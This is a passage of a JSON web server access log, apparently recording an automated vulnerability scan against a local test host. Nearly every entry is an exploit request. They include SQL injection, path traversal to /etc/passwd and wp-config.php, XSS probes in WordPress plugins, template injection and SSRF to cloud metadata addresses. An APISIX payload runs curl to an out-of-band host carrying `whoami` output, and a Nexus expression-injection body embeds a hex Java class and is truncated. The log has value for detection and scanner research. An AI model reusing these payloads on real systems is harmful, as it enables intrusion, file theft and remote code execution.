'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null; #","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger-ui/swagger-ui.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /html/device-id HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"requester=login&request=login¶ms=[{\x22name\x22:\x22input_id\x22,\x22value\x22:\x22USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy\x22},{\x22name\x22:\x22input_passwd\x22,\x22value\x22:\x22PASSWORD\x22},{\x22name\x22:\x22device_id\x22,\x22value\x22:\x22xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\x22},{\x22name\x22:\x22checked\x22,\x22value\x22:false},{\x22name\x22:\x22login_key\x22,\x22value\x22:\x22\x22}]","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /http/index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql/graphql-playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?mdocs-img-preview=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /owncloud/config/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /concerto/Login?goto=Central HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.example HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/40 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"{\x0D\x0A \x22headers\x22:{\x0D\x0A \x22X-Real-IP\x22:\x22127.0.0.1\x22,\x0D\x0A \x22Content-Type\x22:\x22application/json\x22\x0D\x0A },\x0D\x0A \x22timeout\x22:1500,\x0D\x0A \x22pipeline\x22:[\x0D\x0A {\x0D\x0A \x22method\x22:\x22PUT\x22,\x0D\x0A \x22path\x22:\x22/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1\x22,\x0D\x0A \x22body\x22:\x22{\x5Cr\x5Cn \x5C\x22name\x5C\x22: \x5C\x22test\x5C\x22, \x5C\x22method\x5C\x22: [\x5C\x22GET\x5C\x22],\x5Cr\x5Cn \x5C\x22uri\x5C\x22: \x5C\x22/api/29N5mE3bQL8oG6rxNWGoxjFlwtf\x5C\x22,\x5Cr\x5Cn \x5C\x22upstream\x5C\x22:{\x5C\x22type\x5C\x22:\x5C\x22roundrobin\x5C\x22,\x5C\x22nodes\x5C\x22:{\x5C\x22httpbin.org:80\x5C\x22:1}}\x5Cr\x5Cn,\x5Cr\x5Cn\x5C\x22filter_func\x5C\x22: \x5C\x22function(vars) os.execute('curl https://ca2u0eosmpv1jhs80ca0m5gwk7uaurngj.oast.fun/`whoami`'); return true end\x5C\x22}\x22\x0D\x0A }\x0D\x0A ]\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apisix/batch-requests HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bolt/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?s=/index/index/name/$%7B@phpinfo()%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /solr/admin/cores?wt=json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/swagger-ui.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"csrf_token={{csrf_token}}&username=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"http://127.0.0.1/admin/airflow/login", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/address_add/add.php?first=HOVER%20ME!%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?/AdminAppData@no-mobile-0/0/15503332983847185/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql/schema.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tests/generate.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /boafrm/formWlanRedirect?redirect-url=http://example.com&wlan_id=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /npm-debug.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.stage HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/41 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/29N5mE3bQL8oG6rxNWGoxjFlwtf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"tab=%3C%2Fscript%3E%3Csvg%2Fonload%3Dalert%28%2FXSS%2F%29%3E","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/options-general.php?page=seo-redirection.php&tab=cutom HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /anything_here HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/users/admin/check HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/latest/meta-data/ HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.423","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"169.254.169.254","request":"GET http://169.254.169.254/opc/v1/instance HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.309","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger-ui.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"Login=admin&Password=12345&Action=AdminLogin&XToken={{token}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /?/Ajax/&q[]=/0/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /admin/login/?next=/admin/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql/schema.xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/tidio-form/popup-insert-help.php?formId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"{\x22action\x22: \x22coreui_Component\x22, \x22type\x22: \x22rpc\x22, \x22tid\x22: 8, \x22data\x22: [{\x22sort\x22: [{\x22direction\x22: \x22ASC\x22, \x22property\x22: \x22name\x22}], \x22start\x22: 0, \x22filter\x22: [{\x22property\x22: \x22repositoryName\x22, \x22value\x22: \x22*\x22}, {\x22property\x22: \x22expression\x22, \x22value\x22: \x22function(x, y, z, c, integer, defineClass){ c=1.class.forName('java.lang.Character'); integer=1.class; x='cafebabe0000003100ae0a001f00560a005700580a005700590a005a005b0a005a005c0a005d005e0a005d005f0700600a000800610a006200630700640800650a001d00660800410a001d00670a006800690a0068006a08006b08004508006c08006d0a006e006f0a006e00700a001f00710a001d00720800730a000800740800750700760a001d00770700780a0079007a08007b08007c07007d0a0023007e0a0023007f0700800100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100114c4578706c6f69742f546573743233343b01000474657374010015284c6a6176612f6c616e672f537472696e673b29560100036f626a0100124c6a6176612f6c616e672f4f626a6563743b0100016901000149010003636d640100124c6a6176612f6c616e672f537472696e673b01000770726f636573730100134c6a6176612f6c616e672f50726f636573733b01000269730100154c6a6176612f696f2f496e70757453747265616d3b010006726573756c740100025b42010009726573756c745374720100067468726561640100124c6a6176612f6c616e672f5468726561643b0100056669656c640100194c6a6176612f6c616e672f7265666c6563742f4669656c643b01000c7468726561644c6f63616c7301000e7468726561644c6f63616c4d61700100114c6a6176612f6c616e672f436c6173733b01000a7461626c654669656c640100057461626c65010005656e74727901000a76616c75654669656c6401000e68747470436f6e6e656374696f6e01000e48747470436f6e6e656374696f6e0100076368616e6e656c01000b487474704368616e6e656c010008726573706f6e7365010008526573706f6e73650100067772697465720100154c6a6176612f696f2f5072696e745772697465723b0100164c6f63616c5661726961626c65547970655461626c650100144c6a6176612f6c616e672f436c6173733c2a3e3b01000a457863657074696f6e7307008101000a536f7572636546696c6501000c546573743233342e6a6176610c002700280700820c008300840c008500860700870c008800890c008a008b07008c0c008d00890c008e008f0100106a6176612f6c616e672f537472696e670c002700900700910c009200930100116a6176612f6c616e672f496e74656765720100106a6176612e6c616e672e5468726561640c009400950c009600970700980c0099009a0c009b009c0100246a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617001002a6a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617024456e74727901000576616c756507009d0c009e009f0c009b00a00c00a100a20c00a300a40100276f72672e65636c6